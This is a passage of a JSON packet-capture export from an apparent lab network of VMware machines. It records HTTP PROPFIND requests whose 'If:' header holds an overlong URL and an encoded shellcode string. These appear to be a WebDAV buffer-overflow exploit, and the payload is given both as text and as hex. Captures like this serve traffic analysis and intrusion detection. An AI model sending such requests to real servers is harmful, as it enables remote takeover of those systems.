"tcp.payload": "30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "154",
|
||
"tcp.segment": "155",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1727",
|
||
"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:61:77:4b:58:6b:4c:58:51:75:43:78:4b:50:4b:71:67:69:4f:48:6f:71:57:6a:6e:51:6b:75:4d:51:7a:47:78:64:46:71:6a:73:78:78:78:77:50:69:59:68:53:7a:66:70:54:41:47:45:4d:46:51:44:50:4f:52:4b:78:71:43:4d:4c:61:57:52:56:46:42:71:62:46:74:70:44:67:6d:4b:78:79:4d:6e:62:4c:59:6f:64:63:71:6a:51:62:77:4c:5a:77:43:49:62:59:6d:50:64:63:58:e6:b5:8b:e7:85:aa:e4:8d:81:e4:ad:96:e6:bd:b8:e7:8d:b7:e6:ad:b6:e7:81:93:e6:b5:a6:e6:ad:aa:e5:89:8e:e7:95:ba:e6:89:81:e6:a5:84:e7:8d:94:e4:85:b5:c8:82:c8:82:e1:8b:80:e6:a0:83:e4:99:89:e5:a9:a1:e5:a5:ad:e5:95:ac:e6:a9:af:e4:ad:a9:e4:a5:b1:e4:9d:82:e6:bd:b6:e4:b1:93:e7:9d:ac:e4:85:8e:e6:a1:b8:e4:a9:b4:e4:9d:aa:e7:95:a4:e6:85:90:e4:a1:8d:e7:91:a8:e6:b1:b2:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:57:5a:41:67:76:6a:50:42:5a:43:48:46:41:4e:50:4a:4d:56:6b:66:48:7a:6a:4a:47:42:50:77:64:51:45:6b:4f:72:4b:4d:75:58:51:69:52:77:7a:51:69:4c:47:48:48:77:54:50:74:6e:48:4b:6f:6c:48:56:4b:4e:4a:6a:45:46:6d:4a:45:48:54:72:66:6a:72:4b:6d:42:43:4c:43:7a:52:72:54:43:6f:4b:45:4f:4b:4a:6f:59:67:4a:61:42:73:57:59:56:76:55:43:73:44:6f:e7:a1:ad:e5:a9:ac:e4:ad:b6:e5:9d:b2:e5:8d:b3:e7:a1:85:e6:95:b8:e4:9d:b9:e5:a9:b9:e6:85:96:e5:9d:ac:e6:b1:94:e6:b5:a4:e4:b1:8c:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e5:89:b8:e5:a9:83:e4:91:97:e6:b1:a6:e1:8f:80:e6:a0:83:e5:a5:b9:e4:8d:b0:e6:9d:8b:e6:a9:93:e4:8d:94:e7:8d:87:e6:bd:a8:e5:8d:88:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
"http.request.line": "If: <http://192.168.68.1:80/awKXkLXQuCxKPKqgiOHoqWjnQkuMQzGxdFqjsxxxwPiYhSzfpTAGEMFQDPORKxqCMLaWRVFBqbFtpDgmKxyMnbLYodcqjQbwLZwCIbYmPdcX<63><58><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/WZAgvjPBZCHFANPJMVkfHzjJGBPwdQEkOrKMuXQiRwzQiLGHHwTPtnHKolHVKNJjEFmJEHTrfjrKmBCLCzRrTCoKEOKJoYgJaBsWYVvUCsDo<44><6F><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "157"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.464304000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.464304000",
|
||
"frame.time_delta": "0.000010000",
|
||
"frame.time_delta_displayed": "0.016003000",
|
||
"frame.time_relative": "16.715244000",
|
||
"frame.number": "164",
|
||
"frame.len": "343",
|
||
"frame.cap_len": "343",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "329",
|
||
"ip.id": "0x00003742",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x0000f905",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "46433",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "46433",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "37",
|
||
"tcp.len": "277",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "3146110832",
|
||
"tcp.nxtseq": "1726",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "1634608573",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x0000c047",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:ca:ef:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:ca:ef:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868271",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000988000",
|
||
"tcp.analysis.bytes_in_flight": "1725",
|
||
"tcp.analysis.push_bytes_sent": "1725"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.001564000",
|
||
"tcp.time_delta": "0.000010000"
|
||
},
|
||
"tcp.payload": "52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "163",
|
||
"tcp.segment": "164",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1725",
|
||
"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:4c:64:4c:64:47:63:6f:48:53:59:54:6b:74:55:6b:51:50:63:4d:72:62:42:78:59:65:66:45:6d:58:46:47:57:75:68:53:67:46:52:66:6a:77:44:4a:69:77:71:65:6b:50:43:67:56:75:4e:68:79:51:70:57:62:58:6a:59:79:48:6c:76:71:55:52:68:6b:4a:48:41:4a:44:5a:51:77:4f:53:53:56:4f:62:44:62:4d:6c:65:49:6c:64:74:46:4e:56:41:51:4e:50:68:41:50:49:6f:e6:a1:95:e6:ad:81:e4:a5:b3:e7:89:8e:e6:85:ba:e7:a1:98:e7:95:87:e5:81:81:e7:a9:a8:e7:89:8e:e4:a5:ac:e5:8d:a7:e6:bd:81:e6:99:a3:e5:8d:84:e4:95:87:c8:82:c8:82:e1:8b:80:e6:a0:83:e4:9d:b6:e6:b5:8d:e5:a1:a3:e4:a1:b2:e5:8d:8b:e4:b9:b3:e7:91:90:e5:9d:8f:e6:85:b0:e7:81:a9:e7:95:97:e4:9d:b7:e6:9d:82:e4:9d: